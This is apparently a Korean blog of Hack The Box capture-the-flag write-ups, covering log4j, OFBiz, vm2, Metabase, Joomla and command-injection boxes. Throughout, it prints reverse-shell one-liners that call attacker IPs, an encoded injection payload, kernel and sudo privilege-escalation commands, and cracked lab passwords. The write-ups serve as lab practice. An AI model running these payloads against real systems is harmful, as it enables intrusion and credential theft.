Oh! JUN

HTTP Request smuggling

Kwon Oh! JUN — Mon, 26 Jan 2026 23:24:46 +0900

1. CL.TE

2. TE.CL

[Hack The Box] crafty (보류 => 문제해결 => 또 안됨)

Kwon Oh! JUN — Tue, 20 Feb 2024 16:51:20 +0900

1. 정보 수집

'80'번 포트 열려있는거 확인할 수 있고 접속해볼거임.

서브 도메인은 20000개 돌렸는데도 발견되는건 없음.

'80'번 포트로 접속해봤는데 play.crafty.htb도 접속도 안되고 딱히 정보가 없음.

그래서 포트를 전체 스캔을 했는데 '25565' 마인크래프트 게임 관련된 포트인거 같음.

2. 초기 접근

https://help.minecraft.net/hc/en-us/articles/4416199399693-Security-Vulnerability-in-Minecraft-Java-Edition

'Minecraft 1.16.5 cve' 검색하니까 마인크래프트 사이트에서 log4j 보안 취약성에 대한 공지문을 확인할 수 있었음.

GitHub - kozmer/log4j-shell-poc: A Proof-Of-Concept for the CVE-2021-44228 vulnerability.

A Proof-Of-Concept for the CVE-2021-44228 vulnerability. - GitHub - kozmer/log4j-shell-poc: A Proof-Of-Concept for the CVE-2021-44228 vulnerability.

github.com

'log4j exploit' 입력하니까 해당 github 확인할 수 있었음.

우선, 해당 파일 git clone 해줌

poc.py 코드 수정 해줄게 있음.

String cmd = "\bin\bash";로 되어있는거 windows 환경에 맞추어서 cmd.exe로 바꿔주었음.

'/home/kali/crafty/log4j-shell-poc/jdk 1.8.0_20/bin/java'를 찾을 수 없다고 함.

jdk1.8.0_181 다운받고 스크립트에서 인식할 수 있도록 이름을 jdk1.8.0_20 변경.

poc.py 이미 실행해서 1389, 80번 포트를 사용중이어서 kill 해줘야됨.

실행중인 포트를 확인하고

포트번호를 입력하면 PID를 확인할 수 있고 해당 PID를 kill 해주면 됨.

다시 실행하니까 잘 작동하는것을 확인할 수 있음.

--userip 10.10.14.72 : 공격 대상은 공격자 주소로 접속하여 악성 코드를 실행하게 됨.

--webport 80 : 공격 대상이 접속하여 악성 코드를 다운 받을 수 있도록 함.

--lport 9001 : 이 스크립트가 생성하는 역방향 쉘(reverse shell)의 포트 번호를 9001로 설정

'10.10.11.249:25565' 마인크래프트 서버에 접속하려면 마인크래프트를 설치해야됨.

.dev 계열 마인크래프트를 다운받고

설치를 완료했음.

마인크래프트 런처를 실행하고 설치하면 됨.

근데 생각해보니까 데모버전이라서 multi 서버를 열수가 없음... 엉?

오 마이

GitHub - ammaraskar/pyCraft: Minecraft-client networking library in Python

Minecraft-client networking library in Python. Contribute to ammaraskar/pyCraft development by creating an account on GitHub.

github.com

다른 사람이 write-up 쓴걸 보니까 저걸 사용해서 마인크래프트 서버에 접속함.

~~문제는 여기서 해결을 못하고 있음..~~

~~-체크-~~

~~1. 지원하는 마인크래프트 버전 : 1.16.5 (확인)~~

~~2. 지원하는 파이썬 버전 : 3.11 => 3.9로 다운그레이드 중 (안해도 됨)~~

~~- 확인한 레퍼런스 -~~

~~https://breachforums.is/Thread-HTB-Crafty--104685~~

~~https://github.com/ammaraskar/pyCraft?tab=readme-ov-file~~

해결완료!!

sudo apt dist-upgrade

시스템 업그레이드하고 실행하니까 정상적으로 잘 작동하는것을 확인할 수 있음.

중간정리

1. poc.py 실행시키고

2. 9001 포트 열고

3. 마인크래프트 서버에 접속해서 '${jndi:ldap://10.10.14.72:1389/a}' 입력하면

4. 9001포트에서 시스템 명령어 사용 가능

엥?.. 또 안되네 뭐지 아

다시해보니까 작동해서 빠르게 'user.txt' flag 찾음 근데 지금 시점으로 다시 서버 연결이 안됨...

[Hack The Box] bizness

Kwon Oh! JUN — Mon, 19 Feb 2024 18:36:18 +0900

1. 정보수집

1.1. 포트 스캔

nmap -sV 10.10.11.252 -T5

1.2. 디렉터리 확인

dirsearch -u https://bizness.htb

'accounting' 로그인 관련 디렉터리인거 같음.

1.3. 서브 도메인 확인

ffuf -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt -u http://bizness.htb/ -H "Host: FUZZ.bizness.htb" -mc 200

서브 도메인은 확인 할 수 없었음.

2. 초기접근

2.1. 'CVE-2023-51467' 활용한 리버스 쉘

https://bizness.htb/accounting

Apache OFBiz는 오픈 소스 전사적 자원 관리 시스템입니다. 엔터프라이즈의 많은 비즈니스 프로세스를 통합하고 자동화하는 엔터프라이즈 애플리케이션 제품군을 제공합니다. OFBiz는 Apache Software Foundation 최상위 프로젝트입니다

'/accounting' 디렉터리 검색해보니까 로그인 관련 웹 페이지를 확인할 수 있음. OFBIZ 관련해서 CVE 검색해볼꺼임.

wget https://raw.githubusercontent.com/jakabakos/Apache-OFBiz-Authentication-Bypass/master/exploit.py

'CVE-2023-51467' 취약점을 확인할 수 있었고 사용해서 리버스 쉘을 실행할꺼임.

GitHub - jakabakos/Apache-OFBiz-Authentication-Bypass: This repo is a PoC with to exploit CVE-2023-51467 and CVE-2023-49070 prea

This repo is a PoC with to exploit CVE-2023-51467 and CVE-2023-49070 preauth RCE vulnerabilities found in Apache OFBiz. - jakabakos/Apache-OFBiz-Authentication-Bypass

github.com

wget https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass/raw/master/ysoserial-all.jar

exploit와 동일한 디렉터리에 ysoserial-all.jar 파일이 있어야 함.

python3 exploit.py --url https://bizness.htb/ --cmd 'nc -c bash 10.10.14.68 9001'

해당 exploit은 https://bizness.htb/(공격대상) 10.10.14.68 9001(공격자)와 리버스스 쉘 연결할꺼임.

nc -lvp 9001

공격자는 9001 포트 열어놓으면 리버스 쉘 연결된것을 확인할 수 있음.

find / -name "user.txt" 2>/dev/null

먼저, 'user.txt' flag를 확인할 수 있음.

3. 권한상승

3.1. SHA-1 해시 크랙

cat /opt/ofbiz/runtime/data/derby/ofbiz/seg0/c54d0.dat

필드	설명
'SHA'	SHA 암호 알고리즘
'd'	솔트
'uP0_QaVBpDWFeo8-dRzDqRwXQ2I'	암호화된 해시

SHA-1: 160비트의 해시 값을 생성하며, 16진수로 표현하면 40자리입니다.
SHA-224: 224비트의 해시 값을 생성하며, 16진수로 표현하면 56자리입니다.
SHA-256: 256비트의 해시 값을 생성하며, 16진수로 표현하면 64자리입니다.
SHA-384: 384비트의 해시 값을 생성하며, 16진수로 표현하면 96자리입니다.
SHA-512: 512비트의 해시 값을 생성하며, 16진수로 표현하면 128자리입니다.

암호화된 해시(uP0_QaVBpDWFeo8-dRzDqRwXQ2I)를 확인하면 25자임. 분명 SHA 알고리즘을 사용했지만, SHA-1, SHA-224, SHA-256 ... 그 어디에도 속하지 않음.

Base64 인코딩은 바이너리 데이터를 ASCII 문자로 변환하는 인코딩 방법입니다. 이 방법은 바이너리 데이터를 텍스트로 안전하게 전송하거나 저장할 수 있게 해줍니다.

Base64 인코딩은 64개의 안전한 문자(대문자 A-Z, 소문자 a-z, 숫자 0-9, 그리고 '+'와 '/')를 사용합니다. 또한, '=' 문자는 패딩으로 사용됩니다.

그러나, '+'와 '/' 문자는 URL과 파일 시스템에서 특별한 의미를 가지므로, 이 문자들을 사용한 Base64 인코딩된 데이터를 URL에 직접 포함시키거나 파일 이름으로 사용하는 것은 문제를 일으킬 수 있습니다.

따라서, 이런 문제를 피하기 위해 URL 안전한 버전의 Base64 인코딩이 만들어졌습니다. 이 버전에서는 '+' 문자 대신 '-' 문자를, '/' 문자 대신 '_' 문자를 사용합니다. 이렇게 하면 인코딩된 데이터를 URL에 직접 포함시키거나 파일 이름으로 사용해도 문제가 발생하지 않습니다.

따라서, 'uP0_QaVBpDWFeo8-dRzDqRwXQ2I'와 같이 '-'와 '' 문자를 포함하는 Base64 인코딩된 데이터는 URL 안전한 버전의 Base64 인코딩을 사용한 것으로 보입니다. 이 데이터를 표준 Base64 인코딩으로 변환하려면 '-'를 '+'로, ''를 '/'로 치환해야 합니다.

base64 — Base16, Base32, Base64, Base85 Data Encodings

Source code: Lib/base64.py This module provides functions for encoding binary data to printable ASCII characters and decoding such encodings back to binary data. It provides encoding and decoding f...

docs.python.org

CyberChef

gchq.github.io

b8fd3f41a541a435857a8f3e751cc3a91c174362:d

'hash:salt' 형식으로 hash.txt 파일을 만들어 줌.

hashcat -m 120 -a 0 --force hash.txt /usr/share/wordlists/rockyou.txt

옵션	설명
-m 120	해시 유형: SHA1 해시에 대한 암호화된 형식
-a 0	공격 모드 : 사전 공격
--force	일부 공고나 체크를 무시함

'usr/share/wrodlists/rockyou.txt' 워드리스트를 사용해서 hash.txt를 크랙함.

b8fd3f41a541a435857a8f3e751cc3a91c174362:d를 크랙한 결과 'monkeybizness'임을 알 수 있음.

su root

root 권한으로 상승.

find / -name "root.txt" 2>/dev/null

'root.txt' flag 확인.

[Hack The Box] codify

Kwon Oh! JUN — Fri, 16 Feb 2024 16:23:13 +0900

1. 정보수집

1.1. nmap을 활용한 스캔

nmap -sV 10.10.11.239 -T5

2. 초기접근

2.1. 'CVE-2023-30547' 샌드박스 탈출 및 임의의 코드 실행

http://codify.htb/editor

'codify' 사이트에서 node.js editor 입력칸을 확인할 수 있음.

http://codify.htb/about

vm2 라이브러리는 JavaScript 샌드박싱을 위해 널리 사용되고 신뢰할 수 있는 도구입니다.

'codify' 사이트에 대해서 찾아보니까 vm2 라이브러리에 대한 취약점을 찾아볼 수 있었음.

wget https://raw.githubusercontent.com/Cur1iosity/CVE-2023-30547/main/CVE-2023-30547.py

해당 github에서 vm2 라이브러리에 대한 exploit을 다운받음.

python3 CVE-2023-30547.py -m reverse_shell -t http://codify.htb/run -p 4321 -i 10.10.14.68

"http://codify.htb/run" 사이트를 대상으로 reverse shell을 실행시킴.

GitHub - Cur1iosity/CVE-2023-30547: Tool for exploring CVE-2023-30547

Tool for exploring CVE-2023-30547. Contribute to Cur1iosity/CVE-2023-30547 development by creating an account on GitHub.

github.com

nc -lvp 4321

reverse shell 받을 포트를 열어두면 연결되는것을 확인할 수 있음.

2.2. 'ticket.db'에서 계정 찾기

find / -name "*.db" 2>/dev/null

어떤 정보를 얻을 수 있나 찾아보다가 *.db 검색해보니 다양한 DB 파일을 확인할 수 있었는데 '/var/www/contact' 웹 서버를 관리하는 디렉터리에서 'tickets,db' 발견할 수 있었음.

sqlite3 tickets.db
.tables

cat 명령어 사용해서 .db 파일을 확인할 수도 있지만, 뒤죽박죽으로 나와서 sqlite3 사용해서 'tickets.db' 파일에 대해 확인해봤음. 'tickets', 'users' 테이블이 존재하는것을 확인할 수 있었음.

select * from users;

'users' 테이블에서 joshua의 hash PW를 확인할 수 있었음. john 도구를 사용해서 크랙할꺼임.

2.3. Hash PW 복호화

sudo mousepad hash.txt

크랙할 id:pw를 hash.txt에 저장했음.

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

john 도구를 사용해서 크랙한 결과 joshua : spongebob1 를 확인할 수 있음.

2.4. 'joshua' 계정으로 ssh 접속하기

ssh joshua@10.10.11.239

joshua 계정정보를 이용해서 ssh 연결을 했음.

cat user.txt

'user.txt' flag를 확인할 수 있음.

3. 권한 상승

3.1. 'mysql-backup.sh' 쉘 분석

sudo -l

joshua 계정으로 sudo로 수행할 수 있는 명령어를 확인해봤는데 mysql-backup.sh 쉘 파일을 실행할 수 있음.

cat mysql-backup.sh

mysql-backup.sh 파일을 실행시켜보니까 '$DB_PASS == $USER_PASS' DB의 패스워드와 USER의 패스워드가 같아야됨.

https://rextester.com/l/bash_online_compiler

'$DB_PASS == $USER_PASS' 이 구문의 문제점은 변수에서 *와 같은 특수문자가 텍스트 처리되지 않고 제 기능으로 실행될 수 있다는거임.

DB_PASS = kwonohjun1234, USER_PASS = kwo* 변수를 지정하면 "password confirmed!' 출력하는것을 확인할 수 있음.

이 취약점을 이용해서 k, k1, k13 ... 이런식으로 문자 하나씩 무차별 대입하면 패스워드를 확인할 수 있음.

* 해결법 : "$DB_PASS" == "$USER_PASS" 변수에 (") 처리해서 텍스트로써 인식하게끔 해줘야됨.

cd /tmp

/tmp 임시 폴더로 이동해서 무차별 대입하는 코드를 작성해야 실행할 수 있음. (권한 때문에)

vi test.py

구문	결과
"echo ''a* \| sudo /opt/scripts/mysql-backup.sh"	"Password Confirmation Failed"
"echo ''b* \| sudo /opt/scripts/mysql-backup.sh"	"Password Confirmation Failed"
"echo ''c* \| sudo /opt/scripts/mysql-backup.sh"	"Password Confirmed!"
"echo ''a* \| sudo /opt/scripts/mysql-backup.sh"	"Password Confirmation Failed"
"echo ''b* \| sudo /opt/scripts/mysql-backup.sh"	"Password Confirmed!"
"echo ''a* \| sudo /opt/scripts/mysql-backup.sh"	"Password Confirmation Failed"
...	...

해당코드는 위의 표처럼 'mysql-backup.sh' 파일의 입력에 a,b,c,... 문자를 무차별 대입해서 패스워드를 알아내는 코드임.

python3 test.py

'kljh12k3jhaskjh12kjh3' 패스워드를 알아낼 수 있었음.

su root

root 권한을 얻기 위한 시도를 하였고 성공했음.

cat root.txt

[Hack The Box] analytics

Kwon Oh! JUN — Wed, 14 Feb 2024 17:31:48 +0900

1. 정보 수집

1.1. nmap을 활용한 스캔

nmap -sV 10.10.11.233 -T5

1.2. 웹 디렉터리와 서브 도메인 찾기

dirsearch -u http://analytical.htb/

웹 사이트 디렉터리를 확인한 결과 힌트가 될만한 디렉터리는 보이지 않음.

ffuf -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt -u http://analytical.htb/ -H "Host: FUZZ.analytical.htb" -mc 200

서브 도메인 유무 결과 "data.analytical.htb"를 확인할 수 있음.

2. 초기 접근

2.1. 'CVE-2023-38646' 활용해 공격 대상 서버에서 임의의 명령어 실행

http://data.analytical.htb/

"data.analytical.htb"에 접속한 결과 로그인 페이지가 뜨는것을 확인할 수 있음.

https://www.cvedetails.com/vulnerability-list/vendor_id-19475/product_id-51231/Metabase-Metabase.html

'metabase' 관련 CVE를 검색해보니 'CVE-2023-38646' 취약점을 통해 공격대상 서버에서 임의의 명령을 수행할 수 있을것으로 보임.

wget https://raw.githubusercontent.com/Pyr0sec/CVE-2023-38646/main/exploit.py

'CVE-2023-38646' 취약점에서 사용되는 exploit를 다운받음.

GitHub - Pyr0sec/CVE-2023-38646: Exploit script for Pre-Auth RCE in Metabase (CVE-2023-38646)

Exploit script for Pre-Auth RCE in Metabase (CVE-2023-38646) - Pyr0sec/CVE-2023-38646

github.com

python3 exploit.py -u http://data.analytical.htb -t 249fa03d-fd94-4d5b-b94f-b4ebf3df681f -
c "bash -i >& /dev/tcp/10.10.14.63/8888 0>&1"

exploit를 실행시켜서 공격 대상 서버에서 'reverse shell' 명령어를 실행시킴.

-u : 공격 대상

-t : 토큰

-c : 페이로드

nc -lvp 8888

reverse shell 시킬 8888번 포트를 열어놓으면 연결되는것을 확인할 수 있음.

2.2. '/proc/self/environ'에서 실행 중인 프로세스의 환경 변수 확인

cat /proc/self/environ | tr '\0' '\n'

/proc/self/environ 파일은 현재 실행 중인 프로세스의 환경 변수를 저장하고 있는 특별한 파일임. 'metabase'의 서버 계정 정보 'META_USER=metalytices', 'META_PASS=An4lytics_ds20223#'을 확인할 수 있음.

ssh metalytics@10.10.11.233

'metalytics : An4lytics_ds20223#' ssh 연결을 통해 서버에 접속할 수 있음.

cat user.txt

'user.txt' flag를 확인할 수 있음.

3. 권한 상승

3.1. 'CVE-2023-2640, CVE-2023-32629'를 활용해 권한 상승

sudo -l

현재 사용자가 사용할 수 있는 권한을 확인해봤지만 아무런 정보를 얻을 수 없었음.

uname -a

이는 리눅스 커널을 실행하는 'myhostname' 호스트가 x86_64 아키텍처를 사용하며, 커널 버전은 '4.15.0-96-generic'이고, 빌드 날짜는 'Wed Apr 1 03:25:46 UTC 2020'임

해당 서버의 모든 시스템 정보를 확인할 수 있음.

6.2.0-25-generic #25~22.04.2-ubuntu privilege escalation vulnerability

해당 시스템의 권한 상승 취약점을 확인하기 위해 구글링 해봄. 'CVE-2023-2640-CVE-2023-32629'에서 ubuntu 커널의 취약점으로 인한 권한 상승을 할 수 있는 취약점을 찾을 수 있었음.

GitHub - g1vi/CVE-2023-2640-CVE-2023-32629: GameOver(lay) Ubuntu Privilege Escalation

GameOver(lay) Ubuntu Privilege Escalation. Contribute to g1vi/CVE-2023-2640-CVE-2023-32629 development by creating an account on GitHub.

github.com

https://raw.githubusercontent.com/g1vi/CVE-2023-2640-CVE-2023-32629/main/exploit.sh

해당 시스템 관련 exploit를 삽입해서 권한 상승을 시도해볼거임.

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'

마지막으로, 'root.txt' flag를 확인할 수 있음.

[Hack The Box] devvortex

Kwon Oh! JUN — Wed, 14 Feb 2024 00:06:44 +0900

1. 정보 수집

1.1. nmap를 활용한 스캔

nmap -sV 10.10.11.242 -T5

IP Address	Ports Open
10.10.11.242	TCP: 22, 80

1.2. 디렉토리와 서브도메인 찾기

dirsearch -u http://devvortex.htb/

dirsearch 도구를 사용해서 웹 사이트에 존재하는 여러가지 디렉터리를 찾았는데 도움이 될만한 정보는 없음.

gobuster dns -d devvortex.htb -w subdomains-top1million-20000.txt -t 100

서브 도메인 주소를 확인해봤으나 확인이 안됨.

ffuf -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt -u http://devvortex.htb/ -H "Host: FUZZ.devvortex.htb" -mc 200

ffuf 도구를 사용해서 도메인 주소를 찾아봄. 여기서는 'dev' 즉 'dev.devvortex.htb' 서브 도메인이 발견됨.

-u : 공격 대상 주소

-H : HTTP 요청 헤더

FUZZ : wordlist를 대입할 위치

-mc : 응답 코드

GitHub - ffuf/ffuf: Fast web fuzzer written in Go

Fast web fuzzer written in Go. Contribute to ffuf/ffuf development by creating an account on GitHub.

github.com

dirsearch -u http://dev.devvortex.htb/

서브 도메인 주소에 존재하는 디렉터리 정보를 찾아봄. '/administrator' 확인을 안해볼수가 없음.

2. 초기 접근

2.2. 'CVE-2023-23752' 을 통한 ID, PW 탈취

http://dev.devvortex.htb/administrator/

'Joomla'는 PHP로 작성된 오픈 소스 저작물 관리 시스템으로, MySQL 데이터베이스를 이용해 웹상에서 다양한 컨텐츠를 관리, 보관, 출판할 수 있는 기능을 갖고 있다. 라이선스는 GPL이며 다양한 언어를 함께 지원한다.

'Joomla' cve 있는지 구글링 해봄.

'CVE-2023-23752' 웹 서비스에 무단 접근이 가능하다고 함. 구글링해서 적용된 exploit 알아봄.

GitHub - K3ysTr0K3R/CVE-2023-23752-EXPLOIT: A PoC exploit for CVE-2023-23752 - Joomla Improper Access Check in Versions 4.0.0 th

A PoC exploit for CVE-2023-23752 - Joomla Improper Access Check in Versions 4.0.0 through 4.2.7 - K3ysTr0K3R/CVE-2023-23752-EXPLOIT

github.com

wget https://raw.githubusercontent.com/K3ysTr0K3R/CVE-2023-23752-EXPLOIT/main/CVE-2023-23752.py

'CVE-2023-23752.py" exploit 코드를 다운받음.

python3 CVE-2023-23752.py -u http://dev.devvortex.htb

공격 대상을 "http://dev.devvortex.htb"로 지정해서 exploit을 실행함. Username : lewis, logan / Password : P4ntherg0t1n5r3c0n## 확인 할 수 있음.

Username : lewis
Passwrod : P4ntherg0t1n5r3c0n##

Username : lewis로 로그인이 가능한 것을 확인할 수 있음.

2.3. php 템플릿에 reverse shell 삽입

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.63/4444 0>&1'");

[System - administrator Template - index.html]에 PHP reverse shell 코드를 삽입함.

/bin/bash -c: bash 쉘에서 명령어를 실행합니다.
bash -i: 대화형(interactive) bash 쉘을 실행합니다.
>& /dev/tcp/10.10.14.63/4444: 새로운 TCP 연결을 생성합니다. 이 연결은 10.10.14.63 IP 주소의 4444 포트로 연결됩니다.
0>&1: 표준 입력(0)을 표준 출력(1)으로 리다이렉션합니다. 이렇게 하면 원격 서버에서 보낸 명령의 결과가 우리에게 되돌아옵니다.

nc -lvp 4444

공격자가 받을 4444 포트를 열어둠.

2.4. MySQL 접속해서 계정 알아보기

mysql -u lewis -p

'Joomla'는 PHP로 작성된 오픈 소스 저작물 관리 시스템으로, MySQL 데이터베이스를 이용해 웹상에서 다양한 컨텐츠를 관리, 보관, 출판할 수 있는 기능을 갖고 있다. 라이선스는 GPL이며 다양한 언어를 함께 지원한다.

'Joomla'는 MySQL DB를 사용함. 그래서 mysql 연결을 시도해 봄.

show databases;

DB 정보를 조회해봄.

use joomla
show tables;

DB를 선택하고 tables 정보를 조회 해봄.

select * from sd4fg_users;

'sd4fg_users' 테이블 정보의 column을 모두 조회하면 'usrname'과 ' hash된 'password'를 확인할 수 있음.

2.5. Hash된 계정정보 크랙하기

sudo mousepad hash.txt

username:password를 'hash.txt' 텍스트 파일에 저장함.

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

john 도구를 사용해서 hash.txt 파일을 크랙할 수 있음. 그 결과 logan:tequiermucho 확인할 수 있음.

ssh logan@10.10.11.242

크랙해서 얻은 username, password를 통해 ssh 연결을 시도함.

cat user.txt

user.txt정보를 확인하여 flag를 얻을 수 있음.

3. 권한 상승

3.1. 'CVE-2023-1326' 을 통한 권한 상승

sudo -l

현재 사용자가 사용할 수 있는 sudo 권한을 확인하고 /usr/bin/apport-cli 대한 취약점이 있는지 구글링 해봄.

(CVE-2023–1326)[Privilege Escalation] apport-cli 2.26.0 | VK9 Security

(CVE-2023–1326)[Privilege Escalation] apport-cli 2.26.0 by Vry4n_ | Jan 14, 2024 | Privilege Escalation | A privilege escalation attack was found in apport-cli 2.26.0 and earlier which is similar to CVE-2023-26604. If a system is specially configured to

vk9-sec.com

해당 사이트에서 권한 상승할 수 있는 취약점을 찾을 수 있음.

sudo /usr/bin/apport-cli --file-bug
Please choose : 1
Please choose : 2
Please choose : V

find / -name "root.txt" 2>/dev/null

root 권한으로 상승되고, root.txt파일에서 flag 정보를 확인할 수 있음.

[Hack The Box] cozyhosting

Kwon Oh! JUN — Tue, 13 Feb 2024 00:56:30 +0900

1. 정보 수집

1.1. nmap을 활용한 스캔

nmap -sV 10.10.11.230 -T5

IP Address	Ports Open
10.10.11.230	TCP: 22, 80

dirsearch -u http://cozyhosting.htb/

dirsearch 도구를 사용해서 웹 사이트에 존재하는 여러가지 디렉터리를 찾았고 그 중 '/actuator/sessions' 디렉터리를 확인해볼것이다.

sudo mousepad /etc/hosts

'/actuator/sessions' 디렉터리를 확인하기전에 10.10.11.230(공격대상)을 cozyhosting.htb로 매핑해줘야 웹 브라우저를 통해 접근이 가능하다.

2. 초기 접근

2.1. 세션 탈취

http://cozyhosting.htb/actuator/sessions

'/actuator/sessions' 디렉터리에 접근하면 세션 값을 확인할 수 있고 밑에서 해당 세션을 통해 로그인을 시도할 것이다.

2.2. Command Injection

Cookie: JSESSIONID=EEFD4DB0661F959332F0F8EF0EEBEF14

'burp suite'도구를 사용해서 로그인 페이지를 캡쳐하고 JSESSIONID를 'kanderson'의 SESSIONID로 설정해주면 된다.(SESSIONID는 변경되므로 위의 이미지와 무관하다.)

http://cozyhosting.htb/admin

해당 계정의 Dashboard로 이동하면서 로그인을 성공한것을 확인할 수 있다. 다음으로 Connection Settings의 input(Hostname, Username)을 확인해 볼 것이다.

host=127.0.0.1&username='

해당 메시지는 bash 셸 스크립트에서 종료되지 않은 따옴표(') 때문에 발생하는 문제를 나타냅니다. 즉 command injection이 발생할 수 있음을 알 수 있다.

host=127.0.0.1&username=echo+"bash+-i+>%26+/dev/tcp/10.10.14.63/9001+0>%261"+|+bash

'echo "bash -i >& /dev/tcp/10.10.14.63/9001 0>&1" | base' 명령어는 '리버스 셸(reverse shell)'을 생성하는 bash 명령어다. 이 명령어를 실행하면, 현재 시스템에서 새로운 bash 셸이 생성되고, 이 셸의 입력과 출력이 10.10.14.63의 9001 포트로 리디렉션된다.

해당 명령어의 결과로는 빈공간(space)를 필터링하고 있음을 알 수 있다.

echo "bash -i >& /dev/tcp/10.10.14.63/9001 0>&1" | base64 -w 0

"bash -i >& /dev/tcp/10.10.14.63/9001 0>&1" 명령어를 base64로 인코딩한다.

;echo${IFS%??}"<reverse shell payload>"${IFS%??}|${IFS%??}base64${IFS%??}-d${IFS%??}|${IFS%??}bash;

;echo${IFS%??}"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC42My85MDAxIDA+JjEK"${IFS%??}|${IFS%??}base64${IFS%??}-d${IFS%??}|${IFS%??}bash;

base64 인코딩된 reverse shell payload를 '| base64 -d' 디코딩 시키고, '| bash' 쉘로 실행시킨다.

nc -lvp 9001

이때, reverse 시킬 IP의 포트를 열어줘야 한다. 해당 IP 주소는 공격자의 IP의 포트다.

ls -alh

'id' 현재 권한은 일반 사용자 권한이다. root 권한으로 상승하기위한 방법을 찾아봐야 한다. cloudhosting-0.0.1.jar 자바 파일 포맷이 힌트가 될 것으로 에측있다.

2.3 cloudhosting-0.0.1.jar 분석

python3 -m http.server 4321

http.server의 4321 포트를 열어서 공격자(kali)에서 해당 .jar 파일을 다운받고 분석할 것이다.

wget http://10.10.11.230:4321/cloudhosting-0.0.1.jar

공격자(kail)에서 .jar 파일을 다운받는다.

jd-gui cloudhosting-0.0.1.jar

'jd-gui'는 .jar 파일을 분석할 수 있는 도구이다. 'application.properties' 는 일반적으로 스프링 부트(Spring Boot)와 같은 Java 기반 애플리케이션에서 사용하는 설정 파일이다. 해당 파일에서 DB(postgres)정보를 알 수 있었고 DB에 접속할것이다.

psql -h 127.0.0.1 -U postgres

reverse shell로 연결되어 있는 공격 대상에서 psql 접속한다.

\d

'/d'는현재 데이터베이스에 있는 모든 테이블, 뷰, 시퀀스, 인덱스 등의 목록을 조회한다.

select * from users;

'users' 테이블의 모든 정보를 조회했는데 hash된 패스워드를 확인할 수 있다.

2.4. Hash PW Crack

sudo mousepad hashes.txt

패스워드를 hashes.txt 파일에 복사 붙여넣기한다.

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
cat ~/.john/john.pot

'john' 도구를 사용해서 'hashes.txt'에 hash된 패스워드를 크래킹할 수 있다. 해당 이미지는 사전에 크랙하여 남아있는 패스워드가 없어서 출력되는 메시지이다.

ls -al /home

'/home' 디렉토리는 일반 사용자 계정의 홈 디렉터리를 저장하기 위한 장소로 사용된다. 'josh' 계정을 확인할 수 있다.

su josh

'josh' 계정으로 변경해볼것이다. 사용되는 패스워드는 'john'도구를 사용해서 크래킹한 패스워드이다.

python3 -c 'import pty;pty.spawn("/bin/bash")'

Python을 사용하여 새로운 bash 셸을 생성하는 명령어이다.

'user.txt' 파일을 확인해보니 해당 flag를 확인할 수 있다.

3. 권한 상승

3.1. SSH을 통한 권한 상승

sudo -l

현재 사용자가 sudo 명령어를 사용하여 실행할 수 있는 명령어 목록을 보여준다.

ssh | GTFOBins

Spawn interactive shell on client, requires a successful connection towards host. ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh host

gtfobins.github.io

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

ssh에서 sudo 권한으로 새로운 셸을 획득하여 시스템에서 권한 상승을 할수 있다.

find / -name "root.txt" 2>/dev/null

'root.txt' flag 정보를 마지막으로 확인할 수 있다.

[Hack The Box] Keeper

Kwon Oh! JUN — Thu, 8 Feb 2024 18:33:55 +0900

Hack The Box

app.hackthebox.com

=====================
# 공격대상 : 10.10.11.227
# 공격자 : 10.10.14.137
=========================

=========================================================================================
|                                   1. 포트 스캐닝                                      | 
=========================================================================================
# nmap의 핑 프로브를 차단하고 있음
┌──(kali㉿kali)-[~/keeper]
└─$ nmap -A 10.10.11.227 -T5
----------------------------------------------------------------------------------                           
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-07 08:39 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 2.47 seconds
----------------------------------------------------------------------------------


# -Pn : 핑 프로브 없이 스캔을 수행할 수 있음
┌──(kali㉿kali)-[~/keeper]
└─$ nmap -Pn 10.10.11.227 -T5                   
----------------------
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
----------------------


┌──(kali㉿kali)-[~/keeper]
└─$ nmap -Pn -A 10.10.11.227 -T5 -p 22,80 -oA keeper_ps  
-----------------------------------------------------------------------------------
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3539d439404b1f6186dd7c37bb4b989e (ECDSA)
|_  256 1ae972be8bb105d5effedd80d8efc066 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
-----------------------------------------------------------------------------------

=========================================================================================
|                                   2. 웹 페이지 진단                                   | 
=========================================================================================
# firefox 열고 'http://10.10.11.227' 실행하면 *.keeper.* 도메인이 변경되면서 인식 못함
--------------------------------------------------------
firefox : 'http://10.10.11.227' error
--------------------------------------------------------


# /etc/hosts에서 IP주소와 도메인주소 매핑해줌.
# *.keeper.* 도메인 주소가 공격대상(10.10.11.227)로 인식되면서 접속 됨.
┌──(kali㉿kali)-[~/keeper]
└─$ cat /etc/hosts
-----------------------------------
10.10.11.227	tickets.keeper.htb
10.10.11.227	keeper.htb
-----------------------------------


# 접속하면 로그인 페이지가 뜨게되는데 기본 id, pw로 이루어져 있음
---------------------------------------------------
Login				4.4.4+dfsg-2ubuntu1
---------------------------------------------------
	Username : root
	Passwrod : password
---------------------------------------------------
					Login
---------------------------------------------------


# 상위 메뉴에서 'Admin - Users'이 유독 눈에 들어옴
